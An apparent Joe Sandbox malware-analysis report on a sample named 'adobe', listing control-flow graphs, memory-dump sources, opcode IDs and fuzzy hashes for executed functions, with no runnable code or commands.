                                                  execution_graph 38951 1250848 38953 125084e 38951->38953 38952 125091b 38953->38952 38955 1251350 38953->38955 38957 125135f 38955->38957 38956 125147a 38956->38953 38957->38956 38959 1258221 38957->38959 38960 125822b 38959->38960 38961 12582e1 38960->38961 38964 6a3f9c0 38960->38964 38969 6a3f9d0 38960->38969 38961->38957 38966 6a3f9d0 38964->38966 38965 6a3fbfa 38965->38961 38966->38965 38967 6a3fc11 GlobalMemoryStatusEx GlobalMemoryStatusEx 38966->38967 38968 6a3fe74 GlobalMemoryStatusEx GlobalMemoryStatusEx 38966->38968 38967->38966 38968->38966 38971 6a3f9e5 38969->38971 38970 6a3fbfa 38970->38961 38971->38970 38972 6a3fc11 GlobalMemoryStatusEx GlobalMemoryStatusEx 38971->38972 38973 6a3fe74 GlobalMemoryStatusEx GlobalMemoryStatusEx 38971->38973 38972->38971 38973->38971

                                                  Executed Functions

                                                  Function 06A334A8 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 124 6a334a8-6a334c9 126 6a334cb-6a334ce 124->126 127 6a334d0-6a334ef 126->127 128 6a334f4-6a334f7 126->128 127->128 129 6a33c98-6a33c9a 128->129 130 6a334fd-6a3351c 128->130 131 6a33ca1-6a33ca4 129->131 132 6a33c9c 129->132 138 6a33535-6a3353f 130->138 139 6a3351e-6a33521 130->139 131->126 134 6a33caa-6a33cb3 131->134 132->131 143 6a33545-6a33554 138->143 139->138 140 6a33523-6a33533 139->140 140->143 252 6a33556 call 6a33cc0 143->252 253 6a33556 call 6a33cc8 143->253 144 6a3355b-6a33560 145 6a33562-6a33568 144->145 146 6a3356d-6a3384a 144->146 145->134 167 6a33850-6a338ff 146->167 168 6a33c8a-6a33c97 146->168 177 6a33901-6a33926 167->177 178 6a33928 167->178 180 6a33931-6a33944 177->180 178->180 182 6a33c71-6a33c7d 180->182 183 6a3394a-6a3396c 180->183 182->167 184 6a33c83 182->184 183->182 186 6a33972-6a3397c 183->186 184->168 186->182 187 6a33982-6a3398d 186->187 187->182 188 6a33993-6a33a69 187->188 200 6a33a77-6a33aa7 188->200 201 6a33a6b-6a33a6d 188->201 205 6a33ab5-6a33ac1 200->205 206 6a33aa9-6a33aab 200->206 201->200 207 6a33ac3-6a33ac7 205->207 208 6a33b21-6a33b25 205->208 206->205 207->208 211 6a33ac9-6a33af3 207->211 209 6a33c62-6a33c6b 208->209 210 6a33b2b-6a33b67 208->210 209->182 209->188 223 6a33b75-6a33b83 210->223 224 6a33b69-6a33b6b 210->224 218 6a33b01-6a33b1e call 6a323a0 211->218 219 6a33af5-6a33af7 211->219 218->208 219->218 226 6a33b85-6a33b90 223->226 227 6a33b9a-6a33ba5 223->227 224->223 226->227 230 6a33b92 226->230 231 6a33ba7-6a33bad 227->231 232 6a33bbd-6a33bce 227->232 230->227 233 6a33bb1-6a33bb3 231->233 234 6a33baf 231->234 236 6a33bd0-6a33bd6 232->236 237 6a33be6-6a33bf2 232->237 233->232 234->232 238 6a33bda-6a33bdc 236->238 239 6a33bd8 236->239 241 6a33bf4-6a33bfa 237->241 242 6a33c0a-6a33c5b 237->242 238->237 239->237 243 6a33bfe-6a33c00 241->243 244 6a33bfc 241->244 242->209 243->242 244->242 252->144 253->144
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-3723351465
                                                  • Opcode ID: 0c773be1338694a9f5ababa28b81dd13935ebd6c137c98c6030c61e600cd2c3c
                                                  • Instruction ID: 7ec781728590553ada82e1845e5b1afa334a003a783b238165680ed446df6b6b
                                                  • Opcode Fuzzy Hash: 0c773be1338694a9f5ababa28b81dd13935ebd6c137c98c6030c61e600cd2c3c
                                                  • Instruction Fuzzy Hash: 80323031E1065ACFCF55EF75D89469DB7B6FF89300F10C66AD409AB224EB30A985CB81
                                                  Function 06A37DC8 Relevance: 3.0, Strings: 2, Instructions: 473COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 798 6a37dc8-6a37de6 800 6a37de8-6a37deb 798->800 801 6a37df8-6a37dfb 800->801 802 6a37ded-6a37df7 800->802 803 6a37e1e-6a37e21 801->803 804 6a37dfd-6a37e19 801->804 805 6a37e23-6a37e3d 803->805 806 6a37e42-6a37e45 803->806 804->803 805->806 807 6a37e47-6a37e55 806->807 808 6a37e5c-6a37e5e 806->808 814 6a37e6e-6a37e84 807->814 817 6a37e57 807->817 810 6a37e60 808->810 811 6a37e65-6a37e68 808->811 810->811 811->800 811->814 819 6a37e8a-6a37e93 814->819 820 6a3809f-6a380a9 814->820 817->808 821 6a380aa-6a380b4 819->821 822 6a37e99-6a37eb6 819->822 825 6a380b6-6a380df 821->825 826 6a3810b 821->826 831 6a3808c-6a38099 822->831 832 6a37ebc-6a37ee4 822->832 828 6a380e1-6a380e4 825->828 829 6a3810f-6a38111 826->829 830 6a3810d 826->830 833 6a38197-6a3819a 828->833 834 6a380ea-6a380f6 828->834 835 6a3811b-6a38122 829->835 830->835 831->819 831->820 832->831 857 6a37eea-6a37ef3 832->857 836 6a381a0-6a381af 833->836 837 6a383c6-6a383c9 833->837 842 6a38101-6a38103 834->842 838 6a38133 835->838 839 6a38124-6a38131 835->839 851 6a381b1-6a381cc 836->851 852 6a381ce-6a38209 836->852 843 6a383cb-6a383e7 837->843 844 6a383ec-6a383ee 837->844 840 6a38138-6a3813a 838->840 839->840 846 6a38151-6a3818a 840->846 847 6a3813c-6a3813f 840->847 842->835 850 6a38105 842->850 843->844 848 6a383f0 844->848 849 6a383f5-6a383f8 844->849 846->836 877 6a3818c-6a38196 846->877 854 6a383fe-6a38407 847->854 848->849 849->828 849->854 850->826 851->852 863 6a3839a-6a383b0 852->863 864 6a3820f-6a38220 852->864 857->821 861 6a37ef9-6a37f15 857->861 870 6a37f1b-6a37f45 861->870 871 6a3807a-6a38086 861->871 863->837 873 6a38226-6a38243 864->873 874 6a38385-6a38394 864->874 884 6a38070-6a38075 870->884 885 6a37f4b-6a37f73 870->885 871->831 871->857 873->874 882 6a38249-6a3833f call 6a365e8 873->882 874->863 874->864 934 6a38341-6a3834b 882->934 935 6a3834d 882->935 884->871 885->884 892 6a37f79-6a37fa7 885->892 892->884 897 6a37fad-6a37fb6 892->897 897->884 899 6a37fbc-6a37fee 897->899 906 6a37ff0-6a37ff4 899->906 907 6a37ff9-6a38015 899->907 906->884 909 6a37ff6 906->909 907->871 910 6a38017-6a3806e call 6a365e8 907->910 909->907 910->871 936 6a38352-6a38354 934->936 935->936 936->874 937 6a38356-6a3835b 936->937 938 6a38369 937->938 939 6a3835d-6a38367 937->939 940 6a3836e-6a38370 938->940 939->940 940->874 941 6a38372-6a3837e 940->941 941->874
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q
                                                  • API String ID: 0-127220927
                                                  • Opcode ID: 1287edb145d4cb7f1ee7dd6c03d6f6482b2135416c33bcf6cd5e5155db6276aa
                                                  • Instruction ID: d219f0cfc894a3806d801230c324c3470632ab79401706862a5df67aeec2d284
                                                  • Opcode Fuzzy Hash: 1287edb145d4cb7f1ee7dd6c03d6f6482b2135416c33bcf6cd5e5155db6276aa
                                                  • Instruction Fuzzy Hash: F6027B30B002259FDB54EB64D990BAEB7B6FF84304F248569E409DB394DB39EC46CB81
                                                  Function 06A355E8 Relevance: 1.8, Strings: 1, Instructions: 600COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1158 6a355e8-6a35605 1159 6a35607-6a3560a 1158->1159 1160 6a35612-6a35615 1159->1160 1161 6a3560c-6a3560d 1159->1161 1162 6a35623-6a35626 1160->1162 1163 6a35617-6a3561e 1160->1163 1161->1160 1164 6a35635-6a35638 1162->1164 1165 6a35628-6a3562e 1162->1165 1163->1162 1167 6a3563a-6a3563d 1164->1167 1168 6a35642-6a35645 1164->1168 1166 6a35630 1165->1166 1165->1167 1166->1164 1167->1168 1169 6a35647-6a35659 1168->1169 1170 6a3565e-6a35661 1168->1170 1169->1170 1171 6a35663-6a35682 1170->1171 1172 6a35687-6a3568a 1170->1172 1171->1172 1174 6a35694-6a35697 1172->1174 1175 6a3568c-6a3568f 1172->1175 1176 6a35721-6a35727 1174->1176 1177 6a3569d-6a356a0 1174->1177 1175->1174 1181 6a35733-6a35739 1176->1181 1182 6a35729 1176->1182 1179 6a356b3-6a356b6 1177->1179 1180 6a356a2-6a356a8 1177->1180 1179->1180 1185 6a356b8-6a356bb 1179->1185 1183 6a35762-6a3576c 1180->1183 1184 6a356ae 1180->1184 1187 6a357b3-6a357e3 1181->1187 1188 6a3573b-6a35743 1181->1188 1186 6a3572e-6a35731 1182->1186 1199 6a35773-6a35775 1183->1199 1184->1179 1190 6a356cf-6a356d2 1185->1190 1191 6a356bd-6a356ca 1185->1191 1186->1181 1192 6a3575d-6a35760 1186->1192 1205 6a357ed-6a357f0 1187->1205 1188->1187 1193 6a35745-6a35752 1188->1193 1194 6a356e3-6a356e6 1190->1194 1195 6a356d4-6a356d8 1190->1195 1191->1190 1192->1183 1198 6a3577a-6a3577d 1192->1198 1193->1187 1197 6a35754-6a35758 1193->1197 1206 6a35703-6a35706 1194->1206 1207 6a356e8-6a356fe 1194->1207 1203 6a357a5-6a357b2 1195->1203 1204 6a356de 1195->1204 1197->1192 1200 6a35789-6a3578c 1198->1200 1201 6a3577f-6a35788 1198->1201 1199->1198 1212 6a35793-6a35795 1200->1212 1213 6a3578e-6a35790 1200->1213 1204->1194 1208 6a357f2-6a357f9 1205->1208 1209 6a357fa-6a357fd 1205->1209 1210 6a35708-6a35717 1206->1210 1211 6a3571c-6a3571f 1206->1211 1207->1206 1216 6a35811-6a35814 1209->1216 1217 6a357ff-6a35806 1209->1217 1210->1211 1211->1176 1211->1186 1214 6a35797 1212->1214 1215 6a3579c-6a3579f 1212->1215 1213->1212 1214->1215 1215->1159 1215->1203 1221 6a35836-6a35839 1216->1221 1222 6a35816-6a3581a 1216->1222 1219 6a358ce-6a358d5 1217->1219 1220 6a3580c 1217->1220 1220->1216 1226 6a35851-6a35854 1221->1226 1227 6a3583b-6a3584c 1221->1227 1224 6a35820-6a35828 1222->1224 1225 6a358d6-6a358e8 1222->1225 1224->1225 1228 6a3582e-6a35831 1224->1228 1236 6a358ea-6a35914 1225->1236 1237 6a35918-6a35919 1225->1237 1229 6a35856-6a3585a 1226->1229 1230 6a3586e-6a35871 1226->1230 1227->1226 1228->1221 1229->1225 1232 6a3585c-6a35864 1229->1232 1233 6a35873-6a3587d 1230->1233 1234 6a35882-6a35885 1230->1234 1232->1225 1240 6a35866-6a35869 1232->1240 1233->1234 1238 6a35887-6a3588b 1234->1238 1239 6a3589f-6a358a2 1234->1239 1242 6a35916 1236->1242 1243 6a35927-6a3592a 1237->1243 1244 6a3591b-6a35922 1237->1244 1238->1225 1245 6a3588d-6a35895 1238->1245 1246 6a358a4-6a358a8 1239->1246 1247 6a358bc-6a358be 1239->1247 1240->1230 1242->1237 1249 6a35934-6a35937 1243->1249 1250 6a3592c-6a35931 1243->1250 1244->1243 1245->1225 1248 6a35897-6a3589a 1245->1248 1246->1225 1251 6a358aa-6a358b2 1246->1251 1252 6a358c0 1247->1252 1253 6a358c5-6a358c8 1247->1253 1248->1239 1254 6a35945-6a35948 1249->1254 1255 6a35939-6a35940 1249->1255 1250->1249 1251->1225 1256 6a358b4-6a358b7 1251->1256 1252->1253 1253->1205 1253->1219 1257 6a3594e-6a35951 1254->1257 1258 6a359cd-6a35b61 1254->1258 1255->1254 1256->1247 1259 6a35953-6a35964 1257->1259 1260 6a3596b-6a3596e 1257->1260 1309 6a35c97-6a35caa 1258->1309 1310 6a35b67-6a35b6e 1258->1310 1265 6a3598d-6a3599e 1259->1265 1271 6a35966 1259->1271 1261 6a35970-6a35981 1260->1261 1262 6a35988-6a3598b 1260->1262 1270 6a359ae-6a359c1 1261->1270 1272 6a35983 1261->1272 1264 6a359a9-6a359ac 1262->1264 1262->1265 1269 6a359c4-6a359c7 1264->1269 1264->1270 1265->1244 1276 6a359a4 1265->1276 1269->1258 1274 6a35cad-6a35cb0 1269->1274 1271->1260 1272->1262 1277 6a35cb2-6a35cc3 1274->1277 1278 6a35cce-6a35cd1 1274->1278 1276->1264 1277->1244 1288 6a35cc9 1277->1288 1280 6a35cd3-6a35ce4 1278->1280 1281 6a35cef-6a35cf2 1278->1281 1280->1244 1289 6a35cea 1280->1289 1281->1258 1282 6a35cf8-6a35cfa 1281->1282 1286 6a35d01-6a35d04 1282->1286 1287 6a35cfc 1282->1287 1286->1242 1290 6a35d0a-6a35d13 1286->1290 1287->1286 1288->1278 1289->1281 1311 6a35c22-6a35c29 1310->1311 1312 6a35b74-6a35b97 1310->1312 1311->1309 1313 6a35c2b-6a35c5e 1311->1313 1321 6a35b9f-6a35ba7 1312->1321 1325 6a35c63-6a35c90 1313->1325 1326 6a35c60 1313->1326 1322 6a35ba9 1321->1322 1323 6a35bac-6a35bed 1321->1323 1322->1323 1334 6a35c05-6a35c16 1323->1334 1335 6a35bef-6a35c00 1323->1335 1325->1290 1326->1325 1334->1290 1335->1290
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  • Opcode ID: 1c849cedbb0e8219835689d7547236de40743bc45ae167add72da2627e47fb6b
                                                  • Instruction ID: 3d5497c900d8f404f7923f374e7a3aa4c68d3a9f8bcc995bda473276754d7139
                                                  • Opcode Fuzzy Hash: 1c849cedbb0e8219835689d7547236de40743bc45ae167add72da2627e47fb6b
                                                  • Instruction Fuzzy Hash: B322D335E002299FDF64EFA8C5806AEB7F2EF85314F248469E449AB344DB35DD42CB91
                                                  Function 06A36638 Relevance: .8, Instructions: 820COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d5e6c08030c308c8658d991b5cd66dea77de8a05ecd5dbb7fde35361cd7d47a
                                                  • Instruction ID: 4253769d7dff60dab1d8bf110d324212d42279b3cbe9debf3135aae45e552c16
                                                  • Opcode Fuzzy Hash: 7d5e6c08030c308c8658d991b5cd66dea77de8a05ecd5dbb7fde35361cd7d47a
                                                  • Instruction Fuzzy Hash: 7862AC34B002259FDB54EB68D580BADB7F2EF88354F248469E806EB355DB35EC46CB80
                                                  Function 06A3C1D8 Relevance: .6, Instructions: 642COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ae27808c4a5e35eac9878fcfec7a79549ebea6da12b1a15dc9f3771cf4896171
                                                  • Instruction ID: 11bdf1c33ed5b55a6e1e5a1b3761036ba073147889507019b6f67424c3a5145d
                                                  • Opcode Fuzzy Hash: ae27808c4a5e35eac9878fcfec7a79549ebea6da12b1a15dc9f3771cf4896171
                                                  • Instruction Fuzzy Hash: 8F328D34A002199FDB54EF68D990BADB7B6EF88320F108525E806FB355DB35EC46CB91
                                                  Function 06A3B26F Relevance: .6, Instructions: 569COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 47bde833b278e4ece7093592c46533e1a4bf61eb9841d20794d44533413f313f
                                                  • Instruction ID: fc125eca6856f20f1133d628b83742a6819ad893bc3ff6198d97b4a0a2a78fa3
                                                  • Opcode Fuzzy Hash: 47bde833b278e4ece7093592c46533e1a4bf61eb9841d20794d44533413f313f
                                                  • Instruction Fuzzy Hash: B2224E70E102198FDF64EF68D5907ADB7A6EB55310F208826F409EF395DA35DC81CBA1
                                                  Function 06A3AD18 Relevance: 10.4, Strings: 8, Instructions: 388COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 6a3ad18-6a3ad36 1 6a3ad38-6a3ad3b 0->1 2 6a3ad55-6a3ad58 1->2 3 6a3ad3d-6a3ad46 1->3 4 6a3ad5a-6a3ad67 2->4 5 6a3ad6c-6a3ad6f 2->5 6 6a3af4f-6a3af86 3->6 7 6a3ad4c-6a3ad50 3->7 4->5 8 6a3ad71-6a3ad76 5->8 9 6a3ad79-6a3ad7c 5->9 16 6a3af88-6a3af8b 6->16 7->2 8->9 11 6a3ad82-6a3ad85 9->11 12 6a3af35-6a3af3e 9->12 14 6a3ad87-6a3ad8b 11->14 15 6a3ad96-6a3ad99 11->15 12->3 17 6a3af44-6a3af4e 12->17 14->17 18 6a3ad91 14->18 19 6a3ad9b-6a3adb7 15->19 20 6a3adbc-6a3adbf 15->20 21 6a3afae-6a3afb1 16->21 22 6a3af8d-6a3afa9 16->22 18->15 19->20 23 6a3adc1-6a3add4 20->23 24 6a3add9-6a3addc 20->24 25 6a3afb3-6a3afbd 21->25 26 6a3afbe-6a3afc1 21->26 22->21 23->24 29 6a3adde-6a3ade7 24->29 30 6a3adec-6a3adee 24->30 27 6a3afc3 call 6a3b26f 26->27 28 6a3afd0-6a3afd3 26->28 38 6a3afc9-6a3afcb 27->38 34 6a3afd9-6a3b014 28->34 35 6a3b23c-6a3b23f 28->35 29->30 36 6a3adf0 30->36 37 6a3adf5-6a3adf8 30->37 49 6a3b207-6a3b21a 34->49 50 6a3b01a-6a3b026 34->50 40 6a3b241-6a3b245 35->40 41 6a3b250-6a3b252 35->41 36->37 37->1 39 6a3adfe-6a3ae22 37->39 38->28 57 6a3af32 39->57 58 6a3ae28-6a3ae37 39->58 40->34 47 6a3b24b 40->47 44 6a3b254 41->44 45 6a3b259-6a3b25c 41->45 44->45 45->16 48 6a3b262-6a3b26c 45->48 47->41 52 6a3b21c 49->52 55 6a3b046-6a3b08a 50->55 56 6a3b028-6a3b041 50->56 52->35 73 6a3b0a6-6a3b0e5 55->73 74 6a3b08c-6a3b09e 55->74 56->52 57->12 61 6a3ae39-6a3ae3f 58->61 62 6a3ae4f-6a3ae8a call 6a365e8 58->62 64 6a3ae43-6a3ae45 61->64 65 6a3ae41 61->65 81 6a3aea2-6a3aeb9 62->81 82 6a3ae8c-6a3ae92 62->82 64->62 65->62 79 6a3b0eb-6a3b1c6 call 6a365e8 73->79 80 6a3b1cc-6a3b1e1 73->80 74->73 79->80 80->49 92 6a3aed1-6a3aee2 81->92 93 6a3aebb-6a3aec1 81->93 85 6a3ae96-6a3ae98 82->85 86 6a3ae94 82->86 85->81 86->81 99 6a3aee4-6a3aeea 92->99 100 6a3aefa-6a3af2b 92->100 95 6a3aec3 93->95 96 6a3aec5-6a3aec7 93->96 95->92 96->92 101 6a3aeee-6a3aef0 99->101 102 6a3aeec 99->102 100->57 101->100 102->100
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-1273862796
                                                  • Opcode ID: be8ed3111eb14af356af0f86c8c384dc65e23286c93ce0364b641a2a99d0ac6c
                                                  • Instruction ID: 2c6fd1f55169cd8162f17b10130510b617fc9bb80ffae4c054dd4687f8ccf3c5
                                                  • Opcode Fuzzy Hash: be8ed3111eb14af356af0f86c8c384dc65e23286c93ce0364b641a2a99d0ac6c
                                                  • Instruction Fuzzy Hash: E0E16030E102298FCB69EF68D5906AEB7B6FF85304F208529E945EB354DB34DC46CB91
                                                  Function 06A3B6A0 Relevance: 8.0, Strings: 6, Instructions: 466COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 254 6a3b6a0-6a3b6c0 255 6a3b6c2-6a3b6c5 254->255 256 6a3b6c7-6a3b6cb 255->256 257 6a3b6ec-6a3b6ef 255->257 258 6a3b6d1-6a3b6e1 256->258 259 6a3ba3f-6a3ba76 256->259 260 6a3b6f1-6a3b6f7 257->260 261 6a3b6fc-6a3b6ff 257->261 272 6a3b6e7 258->272 273 6a3b954-6a3b958 258->273 269 6a3ba78-6a3ba7b 259->269 260->261 262 6a3b701-6a3b716 261->262 263 6a3b73e-6a3b741 261->263 262->259 275 6a3b71c-6a3b739 262->275 265 6a3b743-6a3b748 263->265 266 6a3b74b-6a3b74e 263->266 265->266 270 6a3b750-6a3b759 266->270 271 6a3b75e-6a3b761 266->271 276 6a3ba9e-6a3baa1 269->276 277 6a3ba7d-6a3ba99 269->277 270->271 278 6a3b763-6a3b76c 271->278 279 6a3b77e-6a3b781 271->279 272->257 273->259 274 6a3b95e-6a3b96e 273->274 296 6a3b970 274->296 297 6a3b997-6a3b99b 274->297 275->263 280 6a3baa7-6a3bacf 276->280 281 6a3bd0d-6a3bd0f 276->281 277->276 278->259 282 6a3b772-6a3b779 278->282 283 6a3b783-6a3b787 279->283 284 6a3b795-6a3b798 279->284 340 6a3bad1-6a3bad4 280->340 341 6a3bad9-6a3bb1d 280->341 290 6a3bd11 281->290 291 6a3bd16-6a3bd19 281->291 282->279 283->259 292 6a3b78d-6a3b790 283->292 285 6a3b79a-6a3b79e 284->285 286 6a3b7af-6a3b7b2 284->286 285->259 293 6a3b7a4-6a3b7aa 285->293 294 6a3b7b8-6a3b7bb 286->294 295 6a3b86d-6a3b870 286->295 290->291 291->269 298 6a3bd1f-6a3bd28 291->298 292->284 293->286 300 6a3b7c1-6a3b7c4 294->300 301 6a3b846-6a3b84f 294->301 305 6a3b875-6a3b878 295->305 302 6a3b975-6a3b978 296->302 297->259 304 6a3b9a1-6a3b9b1 297->304 306 6a3b7e6-6a3b7e9 300->306 307 6a3b7c6-6a3b7e1 300->307 310 6a3b9c1-6a3b9ca 301->310 311 6a3b855 301->311 308 6a3b982-6a3b985 302->308 309 6a3b97a-6a3b97d 302->309 304->295 331 6a3b9b7 304->331 312 6a3b89b-6a3b89e 305->312 313 6a3b87a-6a3b896 305->313 321 6a3b800-6a3b803 306->321 322 6a3b7eb-6a3b7ef 306->322 307->306 318 6a3b992-6a3b995 308->318 319 6a3b987-6a3b98d 308->319 309->308 310->259 315 6a3b9cc-6a3b9d3 310->315 320 6a3b85a-6a3b85d 311->320 316 6a3b8b0-6a3b8b3 312->316 317 6a3b8a0-6a3b8ab 312->317 313->312 324 6a3b9d8-6a3b9db 315->324 325 6a3b8b5-6a3b8b9 316->325 326 6a3b8c4-6a3b8c7 316->326 317->316 318->297 329 6a3b9bc-6a3b9bf 318->329 319->318 320->295 328 6a3b85f-6a3b862 320->328 332 6a3b841-6a3b844 321->332 333 6a3b805-6a3b81a 321->333 322->259 330 6a3b7f5-6a3b7fb 322->330 342 6a3b9ed-6a3b9f0 324->342 343 6a3b9dd 324->343 325->270 337 6a3b8bf 325->337 338 6a3b8c9-6a3b917 call 6a365e8 326->338 339 6a3b91c-6a3b91f 326->339 344 6a3b9fb-6a3ba04 328->344 345 6a3b868-6a3b86b 328->345 329->310 329->324 330->321 331->329 332->301 332->320 333->259 354 6a3b820-6a3b83c 333->354 337->326 338->339 351 6a3b921-6a3b92a 339->351 352 6a3b92f-6a3b932 339->352 340->298 373 6a3bb23-6a3bb2c 341->373 374 6a3bd02-6a3bd0c 341->374 342->295 349 6a3b9f6-6a3b9f9 342->349 356 6a3b9e5-6a3b9e8 343->356 344->278 350 6a3ba0a 344->350 345->295 345->305 349->344 357 6a3ba0f-6a3ba12 349->357 350->357 351->352 358 6a3b942-6a3b945 352->358 359 6a3b934-6a3b93d 352->359 354->332 356->342 361 6a3ba22-6a3ba24 357->361 362 6a3ba14-6a3ba1d 357->362 363 6a3b947-6a3b94c 358->363 364 6a3b94f-6a3b952 358->364 359->358 368 6a3ba26 361->368 369 6a3ba2b-6a3ba2e 361->369 362->361 363->364 364->273 364->302 368->369 369->255 370 6a3ba34-6a3ba3e 369->370 376 6a3bb32-6a3bb9e call 6a365e8 373->376 377 6a3bcf8-6a3bcfd 373->377 388 6a3bba4-6a3bba9 376->388 389 6a3bc98-6a3bcad 376->389 377->374 390 6a3bbc5 388->390 391 6a3bbab-6a3bbb1 388->391 389->377 395 6a3bbc7-6a3bbcd 390->395 393 6a3bbb3-6a3bbb5 391->393 394 6a3bbb7-6a3bbb9 391->394 396 6a3bbc3 393->396 394->396 397 6a3bbe2-6a3bbef 395->397 398 6a3bbcf-6a3bbd5 395->398 396->395 405 6a3bbf1-6a3bbf7 397->405 406 6a3bc07-6a3bc14 397->406 399 6a3bc83-6a3bc92 398->399 400 6a3bbdb 398->400 399->388 399->389 400->397 401 6a3bc16-6a3bc23 400->401 402 6a3bc4a-6a3bc57 400->402 414 6a3bc25-6a3bc2b 401->414 415 6a3bc3b-6a3bc48 401->415 411 6a3bc59-6a3bc5f 402->411 412 6a3bc6f-6a3bc7c 402->412 408 6a3bbfb-6a3bbfd 405->408 409 6a3bbf9 405->409 406->399 408->406 409->406 416 6a3bc63-6a3bc65 411->416 417 6a3bc61 411->417 412->399 418 6a3bc2f-6a3bc31 414->418 419 6a3bc2d 414->419 415->399 416->412 417->412 418->415 419->415
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-3723351465
                                                  • Opcode ID: f6d3694aebbfcbdaae35d22c07090c64b10f8bb4a416c72028054f59da0c7efc
                                                  • Instruction ID: 39d3bfbf26729b75f6ba3469172001746f8a61cc5193565e08a39d7501b65277
                                                  • Opcode Fuzzy Hash: f6d3694aebbfcbdaae35d22c07090c64b10f8bb4a416c72028054f59da0c7efc
                                                  • Instruction Fuzzy Hash: 5D026B30E002198FDBA4EF68D5806ADB7B2EF55300F24856AE409EF255DB34DD85CBA1
                                                  Function 06A39198 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 422 6a39198-6a391bd 423 6a391bf-6a391c2 422->423 424 6a39a80-6a39a83 423->424 425 6a391c8-6a391dd 423->425 426 6a39a85-6a39aa4 424->426 427 6a39aa9-6a39aab 424->427 431 6a391f5-6a3920b 425->431 432 6a391df-6a391e5 425->432 426->427 429 6a39ab2-6a39ab5 427->429 430 6a39aad 427->430 429->423 434 6a39abb-6a39ac5 429->434 430->429 439 6a39216-6a39218 431->439 435 6a391e7 432->435 436 6a391e9-6a391eb 432->436 435->431 436->431 440 6a39230-6a392a1 439->440 441 6a3921a-6a39220 439->441 452 6a392a3-6a392c6 440->452 453 6a392cd-6a392e9 440->453 442 6a39222 441->442 443 6a39224-6a39226 441->443 442->440 443->440 452->453 458 6a39315-6a39330 453->458 459 6a392eb-6a3930e 453->459 464 6a39332-6a39354 458->464 465 6a3935b-6a39376 458->465 459->458 464->465 470 6a3939b-6a393a9 465->470 471 6a39378-6a39394 465->471 472 6a393ab-6a393b4 470->472 473 6a393b9-6a39433 470->473 471->470 472->434 479 6a39480-6a39495 473->479 480 6a39435-6a39453 473->480 479->424 484 6a39455-6a39464 480->484 485 6a3946f-6a3947e 480->485 484->485 485->479 485->480
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
